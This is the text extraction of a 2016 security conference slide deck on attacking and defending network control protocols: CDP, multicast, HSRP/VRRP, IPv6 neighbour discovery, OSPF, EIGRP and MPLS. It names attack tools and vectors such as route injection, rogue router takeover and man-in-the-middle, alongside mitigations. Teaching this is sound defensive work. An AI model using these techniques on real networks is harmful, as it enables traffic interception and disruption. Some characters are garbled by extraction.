Exploiting First Hop Protocols to Own the Network Bsides Vienna 2016 Paul Coggin @PaulCoggin 1 1
OSI and TCP/IP Model OSI Model TCP/IP Model 7 Application 6 Presentation Own the Network Application 5 Session Transport 4 Transport Network 3 Internet Data Link 2 Frame Header Network Interface 1 Physical 2 2
Cisco Discovery Protocol (CDP) Cisco Discovery Protocol (CDP) - Great tool for mapping out a network during an audit - Be sure to disable on connections to external networks such as WAN, MetroE - VoIP phones use CDP (how to secure info leakage on VoIP net??) 3 3
Cisco Discovery Protocol (CDP) – Great for Recon! 4 4
Multicast Overview Multicast Multicast Source 1 Source 2 Multicast uses UDP - Routers send One-way traffic stream periodic queries “Fire and Forget” - Host per VLAN per - Video group reports - Many other apps - Host may send Multicast Routing PIM Multicast leave messages - Reverse Path Forwarding(RPF) - IPv4 – IGMP PIM routing - IPv6 - MLD IGMP Report to Join IGMP Report to Join IGMP Report to Join Multicast Group Multicast Group Multicast Group Member 1 Member 2 Member 1 Receiver Receiver Receiver 5 5
Multicast - IGMP 6 6
Multicast Routing - PIM 7 7
Attacking Multicast Multicast Multicast Source 1 Source 2 Craft Router PIM Packets Craft IGMP/MLD - SCAPY - SCAPY - Colasoft Packet Builder - Collasoft Packet Builder - Possible to use GNS3 - IGMP Leaves or Quagga etc to add - IGMP Queries Multicast PIM router - Spoof IGMP Source Local VLAN Segement PIM routing - Hello packets - Join/Prune packets - Assert Unicast PIM Packets - Register - Register-Stop - C-RP-Advertisement Receiver Receiver Receiver 8 8
Securing Multicast Multicast Multicast Source 1 Source 2 Multicast Storm Control on switches - Control Plane Policing(CoPP) L2 port security - Modular Quality of Service - PIM Neighbor Filter (ACL may be defeated by spoofing. Multicast L2 spoof protection needed.) PIM routing - RP Announce Filter - Multicast Boundary Filter - L3 Switch Aggregation Secure Multicast Control Protocol Trust Relationships Receiver Receiver Receiver 9 9
First Hop Redundancy Protocols V Backup router Active router Virtual router 192.168.1.2 192.168.1.1 192.168.1.3 Multicast protocol Priority elects role MD5, clear, no authentication 192.168.1.50 Rogue Protocol Hacking Tools GNS3 Insider V SCAPY Global Load Balancing Protocol (GLBP) Colasoft Packet Builder Hot Standby Router Protocol (HSRP) Many others … Virtual Redundant Router Protocol (VRRP) (Remember to enable IP forwarding) 10 10
VRRP – No Authentication VRRP – No Authentication 11 11
VRRP – Clear Text Authentication VRRP – Clear Text Authentication 12 12
HSRP MITM – Packet Analysis HSRP Password Clear Text 13 13
FHRP – Crafted HSRP Packets Crafted HSRP coup packet with higher priority Routers Rogue Insider 14 14
IPv6 Neighbor Discover Protocol Filter on IPv6 or Ethernet Type 0x86DD to Identify IPv6 Packets IPv6 uses multicast \ No more broadcast 15 15
IPv6 SLACC MITM IPv6 Neighbor Discovery Protocol (NDP) Mitigations (Think ARP for IPv6) - RAguard IPv6 MITM Tools - 802.1x - Chiron, - Private VLANs - Evil FOCA - IPv6 port security - THC Parasite6 - Source\Destination Guard - SCAPY - SeND (encrypt NDP) - Colasoft Packet Builder Rogue Insider Man-in-the-Middle Sending RA’s Windows Mac Linux Default - Hosts Send ICMPv6 Router Solicitation 16 16
IPv6 Network Discovery Spoofing - MITM IPv6 Neighbor Discovery Protocol (NDP) Mitigations (Think ARP for IPv6) - Source\Destination Guard IPv6 MITM Tools - 802.1x - Chiron - Private VLANs - Evil FOCA - IPv6 port security - THC Parasite6 - NDP Spoofing - SCAPY - DHCP Snooping - Colasoft Packet Builder - Source\Destination Guard - SeND (encrypt NDP) Network Discovery Spoofing - MITM (ARP Spoofing equivalent for IPv6) Mac Windows Rogue Linux Insider 17 17
OSPF – No Authentication 18 18
OSPF – Clear Text Authentication 19 19
Hack the Network via OSPF OSPF Exploit Tools Autononynmous System - Quagga External Network Border Router (ASBR) - NRL Core(Network Simulator) BGP, EIGRP, ISIS - Nemesis - Loki Area 0 - GSN3\Dynamips Area 1 - Buy a router on eBay - Hack a router and reconfigure - Code one with Scapy ABR - IP Sorcery( IP Magic) - Cain & Able to crack OSPF MD5 DR Area Border Router BDR Area 2 - MS RRAS (ABR) - NetDude - Collasoft - Phenoelit IRPAS OSPF typically is implemented without any thought to security. LSA’s are mul<cast on the spoke LAN for any user to sniff without MD5. OSPF Attack Vectors - Take over as DR - Inject routes to mask source of attack - DoS - Inject routes for MITM - Add new routes to hacked router - Change interface bandwidth or use IP OSPF Cost for Traffic Engineering on hacked router 20 20
EIGRP – No Authentication 10.1.2.0 255.255.255.0 21 21
Hack the Network via EIGRP EIGRP Attack Vectors - Inject routes to mask source of attack - DoS - Inject routes for MITM - Add new routes to hacked router - Change interface bandwidth for Traffic Engineering on hacked router EIGRP Exploit Tools - GSN3\Dynamips - Buy a router on eBay - Hack a router and reconfigure - Phenoelit IRPAS Similar to OSPF, EIGRP typically is implemented without any thought to security. Network administrators should use authen<ca<on and configure interfaces to be passive in EIGRP. 10.1.1.0 10.1.2.0 192.168.1.0 255.255.255.0 255.255.255.0 255.255.255.0 22 22
DMZ Layer 2 Security DMZ Secure DMZ Trusts - Typically single VLAN - PVLAN - Open trusts Inside VLAN Internet - VACL - DMZ to Internal AD integ. - Separate Virtual or Physical - Pivot from DMZ to Internal network Int w/ ACL’s - Develop a network traffic *NIX w/NIS(AD Integ.) matrix to define required network traffic flows WWW DNS Internal Network SMTP SharePoint Database Email DNS Active Directory 23 23
Layer 2 – Secure Visualization and Instrumentation In-band Monitoring EPC SPAN NOC \ SOC RSPAN ERSPAN Netflow TAP/Sniffer Out-of-bound Network Whitelist the Layer 2 Network Trust Relationships Whitelist Trusted Information Flows in Monitoring Secure Control, Management, Data Planes 24 24
References Developing IP Mul<cast Networks, Vol 1 – Beau Williamson LAN Switch Security – What Hackers Know About Your Switches, Eric Vyncke, Christopher Paggen, Cisco Press Enno Rey - @Enno_Insinuator, �@WEareTROOPERS� �, ERNW Papers and Resources ,www.ernw.de, www.insinuator.net Ivan PepeInjak - @IOShints, Papers and Resources, h[p://www.ipspace.net IPv6 Security, Sco[ Hogg and Eric Vyncke, Cisco Press h[p://www.gtri.com/wp-content/uploads/2014/10/IPv6-Hacker-Halted-The-Hacker-Code-Angels-vs-Demons.pdf The Prac<ce of Network Security Monitoring, Ricard Bejtlich, No Starch Press Router Security Strategies Securing IP Network Traffic Planes, Gregg Schudel, David J. Smith, Cisco Press h[ps://www.cisco.com/go/safe h[p://docwiki.cisco.com/wiki/FHS h[p://www.netop<cs.com/blog/01-07-2011/sample-pcap-files h[p://www.cisco.com/c/en/us/td/docs/ios-xml/ios/ipapp_frp/configura<on/12-4/fp-12-4-book.html h[p://www.cisco.com/c/en/us/td/docs/solu<ons/Enterprise/Security/Baseline_Security/securebasebook/sec_chap8.html h[p://www.cisco.com/c/en/us/td/docs/switches/lan/catalyst6500/ios/12-2SX/best/prac<ces/recommenda<ons.html h[p://www.cisco.com/c/en/us/td/docs/solu<ons/Enterprise/Security/Baseline_Security/securebasebook/sec_chap8.html h[p://www.cisco.com/web/about/security/intelligence/ipv6_first_hop.html h[p://www.cisco.com/c/en/us/support/docs/ip/access-lists/13608-21.html h[p://monkey.org/~dugsong/dsniff/ h[ps://www.yersinia.net h[ps://www.nsa.gov/ia/_files/factsheets/Factsheet-Cisco%20Port%20Security.pdf h[p://iase.disa.mil/s<gs/net_perimeter/network-infrastructure/Pages/index.aspx h[p://www.cisco.com/c/en/us/about/security-center/mul<cast-toolkit.html 25 25
Ques&ons? @PaulCoggin 26 26
OSPF – MD5 Authentication 27 27
EIGRP – MD5 Authentication 10.1.2.0 255.255.255.0 28 28
MPLS Architecture Overview VPN_A VPN_A iBGP sessions 11.5.0.0 10.2.0.0 CE CE P VPN_A VPN_B P 10.1.0.0 10.2.0.0 CE PE CE PE VPN_A P P 11.6.0.0 CE VPN_B PE CE 10.3.0.0 PE VPN_B CE 10.1.0.0 • P Routers (LSRs) are in the Core of the MPLS Cloud • PE Routers (Edge LSRs or LERs) Use MPLS with the Core and Plain IP with CE Routers • P and PE Routers Share a Common IGP • PE Routers are MP-iBGP Fully-meshed Service provider may accidentally or intentionally misconfigure VPN’s Utilize IPSEC VPN over MPLS VPN to insure security 29 29
MPLS Label PCAP - Service Provider Core CPE to CPE Telnet over Service Provider MPLS VPN 32-bit MPLS Label Format • Label : 20-bit • EXP : 3-bit • Bottom-of-Stack : 1-bit • TTL : 8-bit 30 30
Telnet Username \ Password – Clear Text Encapsulated in MPLS VPN A Separate Overlay Encrypted VPN is Required to Secure Your Traffic 31 31
Recommend
More recommend